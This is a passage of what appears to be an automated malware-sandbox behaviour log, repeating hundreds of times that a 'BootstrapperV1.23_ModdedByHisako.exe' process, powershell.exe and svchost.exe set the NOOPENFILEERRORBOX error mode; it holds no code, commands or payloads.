                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
